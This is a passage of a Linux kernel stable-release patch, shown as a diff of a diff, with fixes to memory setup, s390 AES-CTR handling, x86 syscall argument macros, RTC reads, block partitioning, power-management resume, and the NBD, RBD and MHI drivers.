++	max_mapnr = highend_pfn ? highend_pfn : max_low_pfn;
++#else
++	max_mapnr = max_low_pfn;
+ #endif
++	high_memory = (void *) __va(max_low_pfn << PAGE_SHIFT);
+ 
+ 	free_area_init(max_zone_pfns);
+ }
+@@ -453,13 +458,6 @@ void __init mem_init(void)
+ 	 */
+ 	BUILD_BUG_ON(IS_ENABLED(CONFIG_32BIT) && (_PFN_SHIFT > PAGE_SHIFT));
+ 
+-#ifdef CONFIG_HIGHMEM
+-	max_mapnr = highend_pfn ? highend_pfn : max_low_pfn;
+-#else
+-	max_mapnr = max_low_pfn;
+-#endif
+-	high_memory = (void *) __va(max_low_pfn << PAGE_SHIFT);
+-
+ 	maar_init();
+ 	memblock_free_all();
+ 	setup_zero_pages();	/* Setup zeroed pages.  */
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index 3e051a973e9b2..92276bcf19d77 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -123,10 +123,10 @@ static unsigned long f_extend(unsigned long address)
+ #ifdef CONFIG_64BIT
+ 	if(unlikely(parisc_narrow_firmware)) {
+ 		if((address & 0xff000000) == 0xf0000000)
+-			return 0xf0f0f0f000000000UL | (u32)address;
++			return (0xfffffff0UL << 32) | (u32)address;
+ 
+ 		if((address & 0xf0000000) == 0xf0000000)
+-			return 0xffffffff00000000UL | (u32)address;
++			return (0xffffffffUL << 32) | (u32)address;
+ 	}
+ #endif
+ 	return address;
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 2c94f9cf1ce00..6050e6e10d321 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -806,7 +806,6 @@ config THREAD_SHIFT
+ 	int "Thread shift" if EXPERT
+ 	range 13 15
+ 	default "15" if PPC_256K_PAGES
+-	default "15" if PPC_PSERIES || PPC_POWERNV
+ 	default "14" if PPC64
+ 	default "13"
+ 	help
+diff --git a/arch/s390/crypto/aes_s390.c b/arch/s390/crypto/aes_s390.c
+index 526c3f40f6a26..7b66e81e5f876 100644
+--- a/arch/s390/crypto/aes_s390.c
++++ b/arch/s390/crypto/aes_s390.c
+@@ -601,7 +601,9 @@ static int ctr_aes_crypt(struct skcipher_request *req)
+ 	 * final block may be < AES_BLOCK_SIZE, copy only nbytes
+ 	 */
+ 	if (nbytes) {
+-		cpacf_kmctr(sctx->fc, sctx->key, buf, walk.src.virt.addr,
++		memset(buf, 0, AES_BLOCK_SIZE);
++		memcpy(buf, walk.src.virt.addr, nbytes);
++		cpacf_kmctr(sctx->fc, sctx->key, buf, buf,
+ 			    AES_BLOCK_SIZE, walk.iv);
+ 		memcpy(walk.dst.virt.addr, buf, nbytes);
+ 		crypto_inc(walk.iv, AES_BLOCK_SIZE);
+diff --git a/arch/s390/crypto/paes_s390.c b/arch/s390/crypto/paes_s390.c
+index 621322eb0e681..d84d87349718c 100644
+--- a/arch/s390/crypto/paes_s390.c
++++ b/arch/s390/crypto/paes_s390.c
+@@ -688,9 +688,11 @@ static int ctr_paes_crypt(struct skcipher_request *req)
+ 	 * final block may be < AES_BLOCK_SIZE, copy only nbytes
+ 	 */
+ 	if (nbytes) {
++		memset(buf, 0, AES_BLOCK_SIZE);
++		memcpy(buf, walk.src.virt.addr, nbytes);
+ 		while (1) {
+ 			if (cpacf_kmctr(ctx->fc, &param, buf,
+-					walk.src.virt.addr, AES_BLOCK_SIZE,
++					buf, AES_BLOCK_SIZE,
+ 					walk.iv) == AES_BLOCK_SIZE)
+ 				break;
+ 			if (__paes_convert_key(ctx))
+diff --git a/arch/x86/include/asm/syscall_wrapper.h b/arch/x86/include/asm/syscall_wrapper.h
+index fd2669b1cb2d9..e3323a9dc911b 100644
+--- a/arch/x86/include/asm/syscall_wrapper.h
++++ b/arch/x86/include/asm/syscall_wrapper.h
+@@ -58,12 +58,29 @@ extern long __ia32_sys_ni_syscall(const struct pt_regs *regs);
+ 		,,regs->di,,regs->si,,regs->dx				\
+ 		,,regs->r10,,regs->r8,,regs->r9)			\
+ 
++
++/* SYSCALL_PT_ARGS is Adapted from s390x */
++#define SYSCALL_PT_ARG6(m, t1, t2, t3, t4, t5, t6)			\
++	SYSCALL_PT_ARG5(m, t1, t2, t3, t4, t5), m(t6, (regs->bp))
++#define SYSCALL_PT_ARG5(m, t1, t2, t3, t4, t5)				\
++	SYSCALL_PT_ARG4(m, t1, t2, t3, t4),  m(t5, (regs->di))
++#define SYSCALL_PT_ARG4(m, t1, t2, t3, t4)				\
++	SYSCALL_PT_ARG3(m, t1, t2, t3),  m(t4, (regs->si))
++#define SYSCALL_PT_ARG3(m, t1, t2, t3)					\
++	SYSCALL_PT_ARG2(m, t1, t2), m(t3, (regs->dx))
++#define SYSCALL_PT_ARG2(m, t1, t2)					\
++	SYSCALL_PT_ARG1(m, t1), m(t2, (regs->cx))
++#define SYSCALL_PT_ARG1(m, t1) m(t1, (regs->bx))
++#define SYSCALL_PT_ARGS(x, ...) SYSCALL_PT_ARG##x(__VA_ARGS__)
++
++#define __SC_COMPAT_CAST(t, a)						\
++	(__typeof(__builtin_choose_expr(__TYPE_IS_L(t), 0, 0U)))	\
++	(unsigned int)a
++
+ /* Mapping of registers to parameters for syscalls on i386 */
+ #define SC_IA32_REGS_TO_ARGS(x, ...)					\
+-	__MAP(x,__SC_ARGS						\
+-	      ,,(unsigned int)regs->bx,,(unsigned int)regs->cx		\
+-	      ,,(unsigned int)regs->dx,,(unsigned int)regs->si		\
+-	      ,,(unsigned int)regs->di,,(unsigned int)regs->bp)
++	SYSCALL_PT_ARGS(x, __SC_COMPAT_CAST,				\
++			__MAP(x, __SC_TYPE, __VA_ARGS__))		\
+ 
+ #define __SYS_STUB0(abi, name)						\
+ 	long __##abi##_##name(const struct pt_regs *regs);		\
+diff --git a/arch/x86/kernel/hpet.c b/arch/x86/kernel/hpet.c
+index 71f336425e58a..54732da52dc14 100644
+--- a/arch/x86/kernel/hpet.c
++++ b/arch/x86/kernel/hpet.c
+@@ -1436,7 +1436,7 @@ irqreturn_t hpet_rtc_interrupt(int irq, void *dev_id)
+ 	memset(&curr_time, 0, sizeof(struct rtc_time));
+ 
+ 	if (hpet_rtc_flags & (RTC_UIE | RTC_AIE)) {
+-		if (unlikely(mc146818_get_time(&curr_time) < 0)) {
++		if (unlikely(mc146818_get_time(&curr_time, 10) < 0)) {
+ 			pr_err_ratelimited("unable to read current time from RTC\n");
+ 			return IRQ_HANDLED;
+ 		}
+diff --git a/arch/x86/kernel/rtc.c b/arch/x86/kernel/rtc.c
+index 3490464345133..344c141133e4c 100644
+--- a/arch/x86/kernel/rtc.c
++++ b/arch/x86/kernel/rtc.c
+@@ -67,7 +67,7 @@ void mach_get_cmos_time(struct timespec64 *now)
+ 		return;
+ 	}
+ 
+-	if (mc146818_get_time(&tm)) {
++	if (mc146818_get_time(&tm, 1000)) {
+ 		pr_err("Unable to read current time from RTC\n");
+ 		now->tv_sec = now->tv_nsec = 0;
+ 		return;
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index bc288e6bde642..5d4d78c9a7872 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -239,18 +239,6 @@ static bool nested_svm_check_bitmap_pa(struct kvm_vcpu *vcpu, u64 pa, u32 size)
+ 	    kvm_vcpu_is_legal_gpa(vcpu, addr + size - 1);
+ }
+ 
+-static bool nested_svm_check_tlb_ctl(struct kvm_vcpu *vcpu, u8 tlb_ctl)
+-{
+-	/* Nested FLUSHBYASID is not supported yet.  */
+-	switch(tlb_ctl) {
+-		case TLB_CONTROL_DO_NOTHING:
+-		case TLB_CONTROL_FLUSH_ALL_ASID:
+-			return true;
+-		default:
+-			return false;
+-	}
+-}
+-
+ static bool __nested_vmcb_check_controls(struct kvm_vcpu *vcpu,
+ 					 struct vmcb_ctrl_area_cached *control)
+ {
+@@ -270,8 +258,6 @@ static bool __nested_vmcb_check_controls(struct kvm_vcpu *vcpu,
+ 					   IOPM_SIZE)))
+ 		return false;
+ 
+-	if (CC(!nested_svm_check_tlb_ctl(vcpu, control->tlb_ctl)))
+-		return false;
+ 
+ 	return true;
+ }
+diff --git a/block/ioctl.c b/block/ioctl.c
+index ebe4a2653622b..47567ba1185a6 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -20,8 +20,6 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	struct blkpg_partition p;
+ 	sector_t start, length;
+ 
+-	if (disk->flags & GENHD_FL_NO_PART)
+-		return -EINVAL;
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EACCES;
+ 	if (copy_from_user(&p, upart, sizeof(struct blkpg_partition)))
+diff --git a/block/partitions/core.c b/block/partitions/core.c
+index b8112f52d3880..3927f4283f6b6 100644
+--- a/block/partitions/core.c
++++ b/block/partitions/core.c
+@@ -453,6 +453,11 @@ int bdev_add_partition(struct gendisk *disk, int partno, sector_t start,
+ 		goto out;
+ 	}
+ 
++	if (disk->flags & GENHD_FL_NO_PART) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	if (partition_overlaps(disk, start, length, -1)) {
+ 		ret = -EBUSY;
+ 		goto out;
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 5dc9ccdd5a510..c73d1359b9d41 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -290,6 +290,7 @@ static struct crypto_larval *__crypto_register_alg(struct crypto_alg *alg)
+ 		}
+ 
+ 		if (!strcmp(q->cra_driver_name, alg->cra_name) ||
++		    !strcmp(q->cra_driver_name, alg->cra_driver_name) ||
+ 		    !strcmp(q->cra_name, alg->cra_driver_name))
+ 			goto err;
+ 	}
+diff --git a/drivers/base/power/main.c b/drivers/base/power/main.c
+index c501392077940..9c5a5f4dba5a6 100644
+--- a/drivers/base/power/main.c
++++ b/drivers/base/power/main.c
+@@ -579,7 +579,7 @@ bool dev_pm_skip_resume(struct device *dev)
+ }
+ 
+ /**
+- * device_resume_noirq - Execute a "noirq resume" callback for given device.
++ * __device_resume_noirq - Execute a "noirq resume" callback for given device.
+  * @dev: Device to handle.
+  * @state: PM transition of the system being carried out.
+  * @async: If true, the device is being resumed asynchronously.
+@@ -587,7 +587,7 @@ bool dev_pm_skip_resume(struct device *dev)
+  * The driver of @dev will not receive interrupts while this function is being
+  * executed.
+  */
+-static int device_resume_noirq(struct device *dev, pm_message_t state, bool async)
++static void __device_resume_noirq(struct device *dev, pm_message_t state, bool async)
+ {
+ 	pm_callback_t callback = NULL;
+ 	const char *info = NULL;
+@@ -655,7 +655,13 @@ Skip:
+ Out:
+ 	complete_all(&dev->power.completion);
+ 	TRACE_RESUME(error);
+-	return error;
++
++	if (error) {
++		suspend_stats.failed_resume_noirq++;
++		dpm_save_failed_step(SUSPEND_RESUME_NOIRQ);
++		dpm_save_failed_dev(dev_name(dev));
++		pm_dev_err(dev, state, async ? " async noirq" : " noirq", error);
++	}
+ }
+ 
+ static bool is_async(struct device *dev)
+@@ -668,27 +674,35 @@ static bool dpm_async_fn(struct device *dev, async_func_t func)
+ {
+ 	reinit_completion(&dev->power.completion);
+ 
+-	if (is_async(dev)) {
+-		get_device(dev);
+-		async_schedule_dev(func, dev);
++	if (!is_async(dev))
++		return false;
++
++	get_device(dev);
++
++	if (async_schedule_dev_nocall(func, dev))
+ 		return true;
+-	}
++
++	put_device(dev);
+ 
+ 	return false;
+ }
+ 
+ static void async_resume_noirq(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
+-	int error;
+-
+-	error = device_resume_noirq(dev, pm_transition, true);
+-	if (error)
+-		pm_dev_err(dev, pm_transition, " async", error);
++	struct device *dev = data;
+ 
++	__device_resume_noirq(dev, pm_transition, true);
+ 	put_device(dev);
+ }
+ 
++static void device_resume_noirq(struct device *dev)
++{
++	if (dpm_async_fn(dev, async_resume_noirq))
++		return;
++
++	__device_resume_noirq(dev, pm_transition, false);
++}
++
+ static void dpm_noirq_resume_devices(pm_message_t state)
+ {
+ 	struct device *dev;
+@@ -698,14 +712,6 @@ static void dpm_noirq_resume_devices(pm_message_t state)
+ 	mutex_lock(&dpm_list_mtx);
+ 	pm_transition = state;
+ 
+-	/*
+-	 * Advanced the async threads upfront,
+-	 * in case the starting of async threads is
+-	 * delayed by non-async resuming devices.
+-	 */
+-	list_for_each_entry(dev, &dpm_noirq_list, power.entry)
+-		dpm_async_fn(dev, async_resume_noirq);
+-
+ 	while (!list_empty(&dpm_noirq_list)) {
+ 		dev = to_device(dpm_noirq_list.next);
+ 		get_device(dev);
+@@ -713,17 +719,7 @@ static void dpm_noirq_resume_devices(pm_message_t state)
+ 
+ 		mutex_unlock(&dpm_list_mtx);
+ 
+-		if (!is_async(dev)) {
+-			int error;
+-
+-			error = device_resume_noirq(dev, state, false);
+-			if (error) {
+-				suspend_stats.failed_resume_noirq++;
+-				dpm_save_failed_step(SUSPEND_RESUME_NOIRQ);
+-				dpm_save_failed_dev(dev_name(dev));
+-				pm_dev_err(dev, state, " noirq", error);
+-			}
+-		}
++		device_resume_noirq(dev);
+ 
+ 		put_device(dev);
+ 
+@@ -751,14 +747,14 @@ void dpm_resume_noirq(pm_message_t state)
+ }
+ 
+ /**
+- * device_resume_early - Execute an "early resume" callback for given device.
++ * __device_resume_early - Execute an "early resume" callback for given device.
+  * @dev: Device to handle.
+  * @state: PM transition of the system being carried out.
+  * @async: If true, the device is being resumed asynchronously.
+  *
+  * Runtime PM is disabled for @dev while this function is being executed.
+  */
+-static int device_resume_early(struct device *dev, pm_message_t state, bool async)
++static void __device_resume_early(struct device *dev, pm_message_t state, bool async)
+ {
+ 	pm_callback_t callback = NULL;
+ 	const char *info = NULL;
+@@ -811,21 +807,31 @@ Out:
+ 
+ 	pm_runtime_enable(dev);
+ 	complete_all(&dev->power.completion);
+-	return error;
++
++	if (error) {
++		suspend_stats.failed_resume_early++;
++		dpm_save_failed_step(SUSPEND_RESUME_EARLY);
++		dpm_save_failed_dev(dev_name(dev));
++		pm_dev_err(dev, state, async ? " async early" : " early", error);
++	}
+ }
+ 
+ static void async_resume_early(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
+-	int error;
+-
+-	error = device_resume_early(dev, pm_transition, true);
+-	if (error)
+-		pm_dev_err(dev, pm_transition, " async", error);
++	struct device *dev = data;
+ 
++	__device_resume_early(dev, pm_transition, true);
+ 	put_device(dev);
+ }
+ 
++static void device_resume_early(struct device *dev)
++{
++	if (dpm_async_fn(dev, async_resume_early))
++		return;
++
++	__device_resume_early(dev, pm_transition, false);
++}
++
+ /**
+  * dpm_resume_early - Execute "early resume" callbacks for all devices.
+  * @state: PM transition of the system being carried out.
+@@ -839,14 +845,6 @@ void dpm_resume_early(pm_message_t state)
+ 	mutex_lock(&dpm_list_mtx);
+ 	pm_transition = state;
+ 
+-	/*
+-	 * Advanced the async threads upfront,
+-	 * in case the starting of async threads is
+-	 * delayed by non-async resuming devices.
+-	 */
+-	list_for_each_entry(dev, &dpm_late_early_list, power.entry)
+-		dpm_async_fn(dev, async_resume_early);
+-
+ 	while (!list_empty(&dpm_late_early_list)) {
+ 		dev = to_device(dpm_late_early_list.next);
+ 		get_device(dev);
+@@ -854,17 +852,7 @@ void dpm_resume_early(pm_message_t state)
+ 
+ 		mutex_unlock(&dpm_list_mtx);
+ 
+-		if (!is_async(dev)) {
+-			int error;
+-
+-			error = device_resume_early(dev, state, false);
+-			if (error) {
+-				suspend_stats.failed_resume_early++;
+-				dpm_save_failed_step(SUSPEND_RESUME_EARLY);
+-				dpm_save_failed_dev(dev_name(dev));
+-				pm_dev_err(dev, state, " early", error);
+-			}
+-		}
++		device_resume_early(dev);
+ 
+ 		put_device(dev);
+ 
+@@ -888,12 +876,12 @@ void dpm_resume_start(pm_message_t state)
+ EXPORT_SYMBOL_GPL(dpm_resume_start);
+ 
+ /**
+- * device_resume - Execute "resume" callbacks for given device.
++ * __device_resume - Execute "resume" callbacks for given device.
+  * @dev: Device to handle.
+  * @state: PM transition of the system being carried out.
+  * @async: If true, the device is being resumed asynchronously.
+  */
+-static int device_resume(struct device *dev, pm_message_t state, bool async)
++static void __device_resume(struct device *dev, pm_message_t state, bool async)
+ {
+ 	pm_callback_t callback = NULL;
+ 	const char *info = NULL;
+@@ -975,20 +963,30 @@ static int device_resume(struct device *dev, pm_message_t state, bool async)
+ 
+ 	TRACE_RESUME(error);
+ 
+-	return error;
++	if (error) {
++		suspend_stats.failed_resume++;
++		dpm_save_failed_step(SUSPEND_RESUME);
++		dpm_save_failed_dev(dev_name(dev));
++		pm_dev_err(dev, state, async ? " async" : "", error);
++	}
+ }
+ 
+ static void async_resume(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
+-	int error;
++	struct device *dev = data;
+ 
+-	error = device_resume(dev, pm_transition, true);
+-	if (error)
+-		pm_dev_err(dev, pm_transition, " async", error);
++	__device_resume(dev, pm_transition, true);
+ 	put_device(dev);
+ }
+ 
++static void device_resume(struct device *dev)
++{
++	if (dpm_async_fn(dev, async_resume))
++		return;
++
++	__device_resume(dev, pm_transition, false);
++}
++
+ /**
+  * dpm_resume - Execute "resume" callbacks for non-sysdev devices.
+  * @state: PM transition of the system being carried out.
+@@ -1008,27 +1006,17 @@ void dpm_resume(pm_message_t state)
+ 	pm_transition = state;
+ 	async_error = 0;
+ 
+-	list_for_each_entry(dev, &dpm_suspended_list, power.entry)
+-		dpm_async_fn(dev, async_resume);
+-
+ 	while (!list_empty(&dpm_suspended_list)) {
+ 		dev = to_device(dpm_suspended_list.next);
++
+ 		get_device(dev);
+-		if (!is_async(dev)) {
+-			int error;
+ 
+-			mutex_unlock(&dpm_list_mtx);
++		mutex_unlock(&dpm_list_mtx);
++
++		device_resume(dev);
+ 
+-			error = device_resume(dev, state, false);
+-			if (error) {
+-				suspend_stats.failed_resume++;
+-				dpm_save_failed_step(SUSPEND_RESUME);
+-				dpm_save_failed_dev(dev_name(dev));
+-				pm_dev_err(dev, state, "", error);
+-			}
++		mutex_lock(&dpm_list_mtx);
+ 
+-			mutex_lock(&dpm_list_mtx);
+-		}
+ 		if (!list_empty(&dev->power.entry))
+ 			list_move_tail(&dev->power.entry, &dpm_prepared_list);
+ 
+@@ -1269,7 +1257,7 @@ Complete:
+ 
+ static void async_suspend_noirq(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
++	struct device *dev = data;
+ 	int error;
+ 
+ 	error = __device_suspend_noirq(dev, pm_transition, true);
+@@ -1450,7 +1438,7 @@ Complete:
+ 
+ static void async_suspend_late(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
++	struct device *dev = data;
+ 	int error;
+ 
+ 	error = __device_suspend_late(dev, pm_transition, true);
+@@ -1727,7 +1715,7 @@ static int __device_suspend(struct device *dev, pm_message_t state, bool async)
+ 
+ static void async_suspend(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
++	struct device *dev = data;
+ 	int error;
+ 
+ 	error = __device_suspend(dev, pm_transition, true);
+diff --git a/drivers/base/power/trace.c b/drivers/base/power/trace.c
+index 72b7a92337b18..cd6e559648b21 100644
+--- a/drivers/base/power/trace.c
++++ b/drivers/base/power/trace.c
+@@ -120,7 +120,7 @@ static unsigned int read_magic_time(void)
+ 	struct rtc_time time;
+ 	unsigned int val;
+ 
+-	if (mc146818_get_time(&time) < 0) {
++	if (mc146818_get_time(&time, 1000) < 0) {
+ 		pr_err("Unable to read current time from RTC\n");
+ 		return 0;
+ 	}
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 8037aaefeb2ed..9a53165de4cef 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -494,7 +494,7 @@ static int __sock_xmit(struct nbd_device *nbd, struct socket *sock, int send,
+ 		       struct iov_iter *iter, int msg_flags, int *sent)
+ {
+ 	int result;
+-	struct msghdr msg;
++	struct msghdr msg = { };
+ 	unsigned int noreclaim_flag;
+ 
+ 	if (unlikely(!sock)) {
+@@ -509,10 +509,6 @@ static int __sock_xmit(struct nbd_device *nbd, struct socket *sock, int send,
+ 	noreclaim_flag = memalloc_noreclaim_save();
+ 	do {
+ 		sock->sk->sk_allocation = GFP_NOIO | __GFP_MEMALLOC;
+-		msg.msg_name = NULL;
+-		msg.msg_namelen = 0;
+-		msg.msg_control = NULL;
+-		msg.msg_controllen = 0;
+ 		msg.msg_flags = msg_flags | MSG_NOSIGNAL;
+ 
+ 		if (send)
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index afc92869cba42..f58ca9ce35031 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -3453,14 +3453,15 @@ static bool rbd_lock_add_request(struct rbd_img_request *img_req)
+ static void rbd_lock_del_request(struct rbd_img_request *img_req)
+ {
+ 	struct rbd_device *rbd_dev = img_req->rbd_dev;
+-	bool need_wakeup;
++	bool need_wakeup = false;
+ 
+ 	lockdep_assert_held(&rbd_dev->lock_rwsem);
+ 	spin_lock(&rbd_dev->lock_lists_lock);
+-	rbd_assert(!list_empty(&img_req->lock_item));
+-	list_del_init(&img_req->lock_item);
+-	need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING &&
+-		       list_empty(&rbd_dev->running_list));
++	if (!list_empty(&img_req->lock_item)) {
++		list_del_init(&img_req->lock_item);
++		need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING &&
++			       list_empty(&rbd_dev->running_list));
++	}
+ 	spin_unlock(&rbd_dev->lock_lists_lock);
+ 	if (need_wakeup)
+ 		complete(&rbd_dev->releasing_wait);
+@@ -3843,14 +3844,19 @@ static void wake_lock_waiters(struct rbd_device *rbd_dev, int result)
+ 		return;
+ 	}
+ 
+-	list_for_each_entry(img_req, &rbd_dev->acquiring_list, lock_item) {
++	while (!list_empty(&rbd_dev->acquiring_list)) {
++		img_req = list_first_entry(&rbd_dev->acquiring_list,
++					   struct rbd_img_request, lock_item);
+ 		mutex_lock(&img_req->state_mutex);
+ 		rbd_assert(img_req->state == RBD_IMG_EXCLUSIVE_LOCK);
++		if (!result)
++			list_move_tail(&img_req->lock_item,
++				       &rbd_dev->running_list);
++		else
++			list_del_init(&img_req->lock_item);
+ 		rbd_img_schedule(img_req, result);
+ 		mutex_unlock(&img_req->state_mutex);
+ 	}
+-
+-	list_splice_tail_init(&rbd_dev->acquiring_list, &rbd_dev->running_list);
+ }
+ 
+ static bool locker_equal(const struct ceph_locker *lhs,
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index edd153dda40c0..34e0ba6f52d05 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -71,45 +71,77 @@ err_unlock:
+ static int mhi_ep_send_completion_event(struct mhi_ep_cntrl *mhi_cntrl, struct mhi_ep_ring *ring,
+ 					struct mhi_ring_element *tre, u32 len, enum mhi_ev_ccs code)
+ {
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(*tre));
+-	event.dword[0] = MHI_TRE_EV_DWORD0(code, len);
+-	event.dword[1] = MHI_TRE_EV_DWORD1(ring->ch_id, MHI_PKT_TYPE_TX_EVENT);
++	event->ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(*tre));
++	event->dword[0] = MHI_TRE_EV_DWORD0(code, len);
++	event->dword[1] = MHI_TRE_EV_DWORD1(ring->ch_id, MHI_PKT_TYPE_TX_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, ring->er_index, &event, MHI_TRE_DATA_GET_BEI(tre));
++	ret = mhi_ep_send_event(mhi_cntrl, ring->er_index, event, MHI_TRE_DATA_GET_BEI(tre));
++	kfree(event);
++
++	return ret;
+ }
+ 
+ int mhi_ep_send_state_change_event(struct mhi_ep_cntrl *mhi_cntrl, enum mhi_state state)
+ {
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.dword[0] = MHI_SC_EV_DWORD0(state);
+-	event.dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_STATE_CHANGE_EVENT);
++	event->dword[0] = MHI_SC_EV_DWORD0(state);
++	event->dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_STATE_CHANGE_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, 0, &event, 0);
++	ret = mhi_ep_send_event(mhi_cntrl, 0, event, 0);
++	kfree(event);
++
++	return ret;
+ }
+ 
+ int mhi_ep_send_ee_event(struct mhi_ep_cntrl *mhi_cntrl, enum mhi_ee_type exec_env)
+ {
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.dword[0] = MHI_EE_EV_DWORD0(exec_env);
+-	event.dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_EE_EVENT);
++	event->dword[0] = MHI_EE_EV_DWORD0(exec_env);
++	event->dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_EE_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, 0, &event, 0);
++	ret = mhi_ep_send_event(mhi_cntrl, 0, event, 0);
++	kfree(event);
++
++	return ret;
+ }
+ 
+ static int mhi_ep_send_cmd_comp_event(struct mhi_ep_cntrl *mhi_cntrl, enum mhi_ev_ccs code)
+ {
+ 	struct mhi_ep_ring *ring = &mhi_cntrl->mhi_cmd->ring;
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(struct mhi_ring_element));
+-	event.dword[0] = MHI_CC_EV_DWORD0(code);
+-	event.dword[1] = MHI_CC_EV_DWORD1(MHI_PKT_TYPE_CMD_COMPLETION_EVENT);
++	event->ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(struct mhi_ring_element));
++	event->dword[0] = MHI_CC_EV_DWORD0(code);
++	event->dword[1] = MHI_CC_EV_DWORD1(MHI_PKT_TYPE_CMD_COMPLETION_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, 0, &event, 0);
++	ret = mhi_ep_send_event(mhi_cntrl, 0, event, 0);
++	kfree(event);
++
++	return ret;
+ }
+ 
+ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_element *el)
+diff --git a/drivers/bus/mhi/host/main.c b/drivers/bus/mhi/host/main.c
+index 0c3a009ed9bb0..8378c3319cd5c 100644
+--- a/drivers/bus/mhi/host/main.c
++++ b/drivers/bus/mhi/host/main.c
+@@ -268,7 +268,8 @@ static void mhi_del_ring_element(struct mhi_controller *mhi_cntrl,
+ 
+ static bool is_valid_ring_ptr(struct mhi_ring *ring, dma_addr_t addr)
+ {
+-	return addr >= ring->iommu_base && addr < ring->iommu_base + ring->len;
++	return addr >= ring->iommu_base && addr < ring->iommu_base + ring->len &&
++			!(addr & (sizeof(struct mhi_ring_element) - 1));
+ }
+ 
+ int mhi_destroy_device(struct device *dev, void *data)
+@@ -642,6 +643,8 @@ static int parse_xfer_event(struct mhi_controller *mhi_cntrl,
+ 			mhi_del_ring_element(mhi_cntrl, tre_ring);
+ 			local_rp = tre_ring->rp;
+ 
++			read_unlock_bh(&mhi_chan->lock);
++
+ 			/* notify client */
+ 			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
+ 
+@@ -667,6 +670,8 @@ static int parse_xfer_event(struct mhi_controller *mhi_cntrl,
+ 					kfree(buf_info->cb_buf);
+ 				}
+ 			}
++
++			read_lock_bh(&mhi_chan->lock);
+ 		}
+ 		break;
+ 	} /* CC_EOT */
+@@ -1119,17 +1124,15 @@ static int mhi_queue(struct mhi_device *mhi_dev, struct mhi_buf_info *buf_info,
+ 	if (unlikely(MHI_PM_IN_ERROR_STATE(mhi_cntrl->pm_state)))
+ 		return -EIO;
+ 
+-	read_lock_irqsave(&mhi_cntrl->pm_lock, flags);
+-
+ 	ret = mhi_is_ring_full(mhi_cntrl, tre_ring);
+-	if (unlikely(ret)) {
+-		ret = -EAGAIN;
+-		goto exit_unlock;
+-	}
++	if (unlikely(ret))
++		return -EAGAIN;
+ 
+ 	ret = mhi_gen_tre(mhi_cntrl, mhi_chan, buf_info, mflags);
+ 	if (unlikely(ret))
+-		goto exit_unlock;
++		return ret;
++
++	read_lock_irqsave(&mhi_cntrl->pm_lock, flags);
+ 
+ 	/* Packet is queued, take a usage ref to exit M3 if necessary
+ 	 * for host->device buffer, balanced put is done on buffer completion
+@@ -1149,7 +1152,6 @@ static int mhi_queue(struct mhi_device *mhi_dev, struct mhi_buf_info *buf_info,
+ 	if (dir == DMA_FROM_DEVICE)
+ 		mhi_cntrl->runtime_put(mhi_cntrl);
+ 
+-exit_unlock:
+ 	read_unlock_irqrestore(&mhi_cntrl->pm_lock, flags);
+ 
+ 	return ret;
